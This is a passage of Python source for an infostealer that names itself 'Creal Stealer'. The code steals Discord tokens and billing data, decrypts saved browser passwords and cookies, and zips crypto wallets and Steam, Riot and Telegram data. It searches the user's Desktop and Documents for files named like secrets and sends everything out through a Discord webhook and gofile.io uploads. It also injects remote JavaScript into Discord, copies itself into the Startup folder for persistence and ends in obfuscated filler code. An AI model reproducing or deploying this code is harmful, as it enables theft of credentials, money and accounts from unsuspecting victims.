r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
def globalInfo():
ip = g3t1p()
us3rn4m1 = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
# print(ipdatanojson)
ipdata = loads(ipdatanojson)
# print(urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode())
contry = ipdata["country_name"]
contryCode = ipdata["country_code"].lower()
sehir = ipdata["state"]
globalinfo = f":flag_{contryCode}: - `{us3rn4m1.upper()} | {ip} ({contry})`"
return globalinfo
def TR6st(C00k13):
# simple Trust Factor system
global DETECTED
data = str(C00k13)
tim = re.findall(".google.com", data)
# print(len(tim))
if len(tim) < -1:
DETECTED = True
return DETECTED
else:
DETECTED = False
return DETECTED
def G3tUHQFr13ndS(t0k3n):
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
uhqlist = ''
for friend in friendlist:
Own3dB3dg4s = ''
flags = friend['user']['public_flags']
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0 and friend['type'] == 1:
if not "House" in b4dg3["Name"]:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
if Own3dB3dg4s != '':
uhqlist += f"{Own3dB3dg4s} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
process_list = os.popen('tasklist').readlines()
for process in process_list:
if "Discord" in process:
pid = int(process.split()[1])
os.system(f"taskkill /F /PID {pid}")
def G3tb1ll1ng(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
b1ll1ngjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
if b1ll1ngjson == []: return "```None```"
b1ll1ng = ""
for methode in b1ll1ngjson:
if methode["invalid"] == False:
if methode["type"] == 1:
b1ll1ng += ":credit_card:"
elif methode["type"] == 2:
b1ll1ng += ":parking: "
return b1ll1ng
def inj_discord():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
inj_content = requests.get(inj_url).text
inj_content = inj_content.replace("%WEBHOOK%", wh00k)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(inj_content)
inj_discord()
def G3tB4dg31(flags):
if flags == 0: return ''
Own3dB3dg4s = ''
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
return Own3dB3dg4s
def G3tT0k4n1nf9(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rjs0n = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
us3rn4m1 = us3rjs0n["username"]
hashtag = us3rjs0n["discriminator"]
em31l = us3rjs0n["email"]
idd = us3rjs0n["id"]
pfp = us3rjs0n["avatar"]
flags = us3rjs0n["public_flags"]
n1tr0 = ""
ph0n3 = ""
if "premium_type" in us3rjs0n:
nitrot = us3rjs0n["premium_type"]
if nitrot == 1:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122>"
elif nitrot == 2:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122><a:autr_boost1:1038724321771786240>"
if "ph0n3" in us3rjs0n: ph0n3 = f'{us3rjs0n["ph0n3"]}'
return us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3
def ch1ckT4k1n(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def upl05dT4k31(t0k3n, path):
global wh00k
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3 = G3tT0k4n1nf9(t0k3n)
if pfp == None:
pfp = "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
b1ll1ng = G3tb1ll1ng(t0k3n)
b4dg3 = G3tB4dg31(flags)
friends = G3tUHQFr13ndS(t0k3n)
if friends == '': friends = "```No Rare Friends```"
if not b1ll1ng:
b4dg3, ph0n3, b1ll1ng = "🔒", "🔒", "🔒"
if n1tr0 == '' and b4dg3 == '': n1tr0 = "```None```"
data = {
"content": f'{globalInfo()} | `{path}`',
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "<a:hyperNOPPERS:828369518199308388> Token:",
"value": f"```{t0k3n}```",
"inline": True
},
{
"name": "<:mail:750393870507966486> Email:",
"value": f"```{em31l}```",
"inline": True
},
{
"name": "<a:1689_Ringing_Phone:755219417075417088> Phone:",
"value": f"```{ph0n3}```",
"inline": True
},
{
"name": "<:mc_earth:589630396476555264> IP:",
"value": f"```{g3t1p()}```",
"inline": True
},
{
"name": "<:woozyface:874220843528486923> Badges:",
"value": f"{n1tr0}{b4dg3}",
"inline": True
},
{
"name": "<a:4394_cc_creditcard_cartao_f4bihy:755218296801984553> Billing:",
"value": f"{b1ll1ng}",
"inline": True
},
{
"name": "<a:mavikirmizi:853238372591599617> HQ Friends:",
"value": f"{friends}",
"inline": False
}
],
"author": {
"name": f"{us3rn4m1}#{hashtag} ({idd})",
"icon_url": f"{pfp}"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
},
"thumbnail": {
"url": f"{pfp}"
}
}
],
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"username": "Creal Stealer",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
#hersey son defa :(
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def upload(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
if name == "crcook":
rb = ' | '.join(da for da in cookiWords)
if len(rb) > 1000:
rrrrr = R4f0rm3t(str(cookiWords))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Cookies Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n{rb}\n\n**Data:**\n<:cookies_tlm:816619063618568234> • **{CookiCount}** Cookies Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealCookies.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "crpassw":
ra = ' | '.join(da for da in paswWords)
if len(ra) > 1000:
rrr = R4f0rm3t(str(paswWords))
ra = ' | '.join(da for da in rrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Password Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts**:\n{ra}\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> • **{P4sswCount}** Passwords Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealPassword.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "Interesting files found on user PC:",
"value": link
}
],
"author": {
"name": "Creal | File Stealer"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
# def upload(name, tk=''):
# headers = {
# "Content-Type": "application/json",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
# }
# # r = requests.post(hook, files=files)
# LoadRequests("POST", hook, files=files)
_
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for t0k3n in re.findall(regex, line):
global T0k3ns
if ch1ckT4k1n(t0k3n):
if not t0k3n in T0k3ns:
# print(token)
T0k3ns += t0k3n
upl05dT4k31(t0k3n, path)
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in paswWords: paswWords.append(old)
P4ssw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3kryptV4lU3(row[2], master_key)}")
P4sswCount += 1
wr1tef0rf1l3(P4ssw, 'passw')
C00k13 = []
def getC00k13(path, arg):
global C00k13, CookiCount
if not os.path.exists(path): return
pathC = path + arg + "/Cookies"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in cookiWords: cookiWords.append(old)
C00k13.append(f"{row[0]} TRUE / FALSE 2597573456 {row[1]} {D3kryptV4lU3(row[2], master_key)}")
CookiCount += 1
wr1tef0rf1l3(C00k13, 'cook')
def G3tD1sc0rd(path, arg):
if not os.path.exists(f"{path}/Local State"): return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
# print(path, master_key)
for file in os.listdir(pathC):
# print(path, file)
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines() if x.strip()]:
for t0k3n in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
global T0k3ns
t0k3nDecoded = D3kryptV4lU3(b64decode(t0k3n.split('dQw4w9WgXcQ:')[1]), master_key)
if ch1ckT4k1n(t0k3nDecoded):
if not t0k3nDecoded in T0k3ns:
# print(token)
T0k3ns += t0k3nDecoded
# writeforfile(Tokens, 'tokens')
upl05dT4k31(t0k3nDecoded, path)
def GatherZips(paths1, paths2, paths3):
thttht = []
for patt in paths1:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]])
a.start()
thttht.append(a)
for patt in paths2:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]])
a.start()
thttht.append(a)
a = threading.Thread(target=ZipTelegram, args=[paths3[0], paths3[2], paths3[1]])
a.start()
thttht.append(a)
for thread in thttht:
thread.join()
global WalletsZip, GamingZip, OtherZip
# print(WalletsZip, GamingZip, OtherZip)
wal, ga, ot = "",'',''
if not len(WalletsZip) == 0:
wal = ":coin: • Wallets\n"
for i in WalletsZip:
wal += f"└─ [{i[0]}]({i[1]})\n"
if not len(WalletsZip) == 0:
ga = ":video_game: • Gaming:\n"
for i in GamingZip:
ga += f"└─ [{i[0]}]({i[1]})\n"
if not len(OtherZip) == 0:
ot = ":tickets: • Apps\n"
for i in OtherZip:
ot += f"└─ [{i[0]}]({i[1]})\n"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
data = {
"content": globalInfo(),
"embeds": [
{
"title": "Creal Zips",
"description": f"{wal}\n{ga}\n{ot}",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
def ZipTelegram(path, arg, procc):
global OtherZip
pathC = path
name = arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file and not "tdummy" in file and not "user_data" in file and not "webview" in file:
zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
OtherZip.append([arg, lnik])
def Z1pTh1ngs(path, arg, procc):
pathC = path
name = arg
global WalletsZip, GamingZip, OtherZip
# subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)
# os.system(f"taskkill /im {procc} /t /f")
if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Metamask_{browser}"
pathC = path + arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
if "Wallet" in arg or "NationsGlory" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"{browser}"
elif "Steam" in arg:
if not os.path.isfile(f"{pathC}/loginusers.vdf"): return
f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
data = f.readlines()
# print(data)
found = False
for l in data:
if 'RememberPassword"\t\t"1"' in l:
found = True
if found == False: return
name = arg
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file: zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
if "Wallet" in arg or "eogaeaoehlef" in arg:
WalletsZip.append([name, lnik])
elif "NationsGlory" in name or "Steam" in name or "RiotCli" in name:
GamingZip.append([name, lnik])
else:
OtherZip.append([name, lnik])
def GatherAll():
' Default Path < 0 > ProcesName < 1 > Token < 2 > Password < 3 > Cookies < 4 > Extentions < 5 > '
browserPaths = [
[f"{roaming}/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ]
]
discordPaths = [
[f"{roaming}/Discord", "/Local Storage/leveldb"],
[f"{roaming}/Lightcord", "/Local Storage/leveldb"],
[f"{roaming}/discordcanary", "/Local Storage/leveldb"],
[f"{roaming}/discordptb", "/Local Storage/leveldb"],
]
PathsToZip = [
[f"{roaming}/atomic/Local Storage/leveldb", '"Atomic Wallet.exe"', "Wallet"],
[f"{roaming}/Exodus/exodus.wallet", "Exodus.exe", "Wallet"],
["C:\Program Files (x86)\Steam\config", "steam.exe", "Steam"],
[f"{roaming}/NationsGlory/Local Storage/leveldb", "NationsGlory.exe", "NationsGlory"],
[f"{local}/Riot Games/Riot Client/Data", "RiotClientServices.exe", "RiotClient"]
]
Telegram = [f"{roaming}/Telegram Desktop/tdata", 'telegram.exe', "Telegram"]
for patt in browserPaths:
a = threading.Thread(target=getT0k3n, args=[patt[0], patt[2]])
a.start()
Threadlist.append(a)
for patt in discordPaths:
a = threading.Thread(target=G3tD1sc0rd, args=[patt[0], patt[1]])
a.start()
Threadlist.append(a)
for patt in browserPaths:
a = threading.Thread(target=getP4ssw, args=[patt[0], patt[3]])
a.start()
Threadlist.append(a)
ThCokk = []
for patt in browserPaths:
a = threading.Thread(target=getC00k13, args=[patt[0], patt[4]])
a.start()
ThCokk.append(a)
threading.Thread(target=GatherZips, args=[browserPaths, PathsToZip, Telegram]).start()
for thread in ThCokk: thread.join()
DETECTED = TR6st(C00k13)
if DETECTED == True: return
for patt in browserPaths:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]]).start()
for patt in PathsToZip:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]]).start()
threading.Thread(target=ZipTelegram, args=[Telegram[0], Telegram[2], Telegram[1]]).start()
for thread in Threadlist:
thread.join()
global upths
upths = []
for file in ["crpassw.txt", "crcook.txt"]:
# upload(os.getenv("TEMP") + "\\" + file)
upload(file.replace(".txt", ""), uploadToAnonfiles(os.getenv("TEMP") + "\\" + file))
def uploadToAnonfiles(path):
try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
except:return False
# def uploadToAnonfiles(path):s
# try:
# files = { "file": (path, open(path, mode='rb')) }
# upload = requests.post("https://transfer.sh/", files=files)
# url = upload.text
# return url
# except:
# return False
def KiwiFolder(pathF, keywords):
global KiwiFiles
maxfilesperdir = 7
i = 0
listOfFile = os.listdir(pathF)
ffound = []
for file in listOfFile:
if not os.path.isfile(pathF + "/" + file): return
i += 1
if i <= maxfilesperdir:
url = uploadToAnonfiles(pathF + "/" + file)
ffound.append([pathF + "/" + file, url])
else:
break
KiwiFiles.append(["folder", pathF + "/", ffound])
KiwiFiles = []
def KiwiFile(path, keywords):
global KiwiFiles
fifound = []
listOfFile = os.listdir(path)
for file in listOfFile:
for worf in keywords:
if worf in file.lower():
if os.path.isfile(path + "/" + file) and ".txt" in file:
fifound.append([path + "/" + file, uploadToAnonfiles(path + "/" + file)])
break
if os.path.isdir(path + "/" + file):
target = path + "/" + file
KiwiFolder(target, keywords)
break
KiwiFiles.append(["folder", path, fifound])
def Kiwi():
user = temp.split("\AppData")[0]
path2search = [
user + "/Desktop",
user + "/Downloads",
user + "/Documents"
]
key_wordsFolder = [
"account",
"acount",
"passw",
"secret",
"senhas",
"contas",
"backup",
"2fa",
"importante",
"privado",
"exodus",
"exposed",
"perder",
"amigos",
"empresa",
"trabalho",
"work",
"private",
"source",
"users",
"username",
"login",
"user",
"usuario",
"log"
]
key_wordsFiles = [
"passw",
"mdp",
"motdepasse",
"mot_de_passe",
"login",
"secret",
"account",
"acount",
"paypal",
"banque",
"account",
"metamask",
"wallet",
"crypto",
"exodus",
"discord",
"2fa",
"code",
"memo",
"compte",
"token",
"backup",
"secret",
"mom",
"family"
]
wikith = []
for patt in path2search:
kiwi = threading.Thread(target=KiwiFile, args=[patt, key_wordsFiles]);kiwi.start()
wikith.append(kiwi)
return wikith
global keyword, cookiWords, paswWords, CookiCount, P4sswCount, WalletsZip, GamingZip, OtherZip
keyword = [
'mail', '[coinbase](https://coinbase.com)', '[sellix](https://sellix.io)', '[gmail](https://gmail.com)', '[steam](https://steam.com)', '[discord](https://discord.com)', '[riotgames](https://riotgames.com)', '[youtube](https://youtube.com)', '[instagram](https://instagram.com)', '[tiktok](https://tiktok.com)', '[twitter](https://twitter.com)', '[facebook](https://facebook.com)', 'card', '[epicgames](https://epicgames.com)', '[spotify](https://spotify.com)', '[yahoo](https://yahoo.com)', '[roblox](https://roblox.com)', '[twitch](https://twitch.com)', '[minecraft](https://minecraft.net)', 'bank', '[paypal](https://paypal.com)', '[origin](https://origin.com)', '[amazon](https://amazon.com)', '[ebay](https://ebay.com)', '[aliexpress](https://aliexpress.com)', '[playstation](https://playstation.com)', '[hbo](https://hbo.com)', '[xbox](https://xbox.com)', 'buy', 'sell', '[binance](https://binance.com)', '[hotmail](https://hotmail.com)', '[outlook](https://outlook.com)', '[crunchyroll](https://crunchyroll.com)', '[telegram](https://telegram.com)', '[pornhub](https://pornhub.com)', '[disney](https://disney.com)', '[expressvpn](https://expressvpn.com)', 'crypto', '[uber](https://uber.com)', '[netflix](https://netflix.com)'
]
CookiCount, P4sswCount = 0, 0
cookiWords = []
paswWords = []
WalletsZip = [] # [Name, Link]
GamingZip = []
OtherZip = []
GatherAll()
DETECTED = TR6st(C00k13)
# DETECTED = False
if not DETECTED:
wikith = Kiwi()
for thread in wikith: thread.join()
time.sleep(0.2)
filetext = "\n"
for arg in KiwiFiles:
if len(arg[2]) != 0:
foldpath = arg[1]
foldlist = arg[2]
filetext += f"📁 {foldpath}\n"
for ffil in foldlist:
a = ffil[0].split("/")
fileanme = a[len(a)-1]
b = ffil[1]
filetext += f"└─:open_file_folder: [{fileanme}]({b})\n"
filetext += "\n"
upload("kiwi", filetext)
class UMuzEjUeXvllG:
def __init__(self):
self.__GmbYmdILLuYRlZim()
self.__NhiBgGJi()
self.__EOZkWGNvefQhdjkdSv()
self.__LEpwJFCrqe()
self.__RaxQsbUaiXFuosjLjFL()
self.__gFyMUBeclxAMSuLGFI()
self.__peuqNPJgSViqteJ()
self.__ZYLcqbHdYTIqqL()
self.__MgiXVFfX()
def __GmbYmdILLuYRlZim(self, UuRZkBenvdQaxpr, EhsaszgQ, WusaqAueWgoRuFJxREl, rTaQFK, ikgVdCv, CjYaFqqV):
return self.__EOZkWGNvefQhdjkdSv()
def __NhiBgGJi(self, CuBzwZqZVh, vrQntwSfuo, ZNLesUnrw):
return self.__EOZkWGNvefQhdjkdSv()
def __EOZkWGNvefQhdjkdSv(self, ruDEFEVIMPuljxbIum, IcZbAuTO, ZCpTMCgZXOvOlb, XVHYWuS, ROkgZ):
return self.__ZYLcqbHdYTIqqL()
def __LEpwJFCrqe(self, mBAvgegohAEQ, ZGIXDTrwFUgGewuTBXzh):
return self.__MgiXVFfX()
def __RaxQsbUaiXFuosjLjFL(self, MibIKA, JcQaeKrMlNwgyDHed, uIebkvmF):
return self.__NhiBgGJi()
def __gFyMUBeclxAMSuLGFI(self, MYUajyiy, BZVlJGwK, EBUTLJKOimGrKIz):
return self.__RaxQsbUaiXFuosjLjFL()
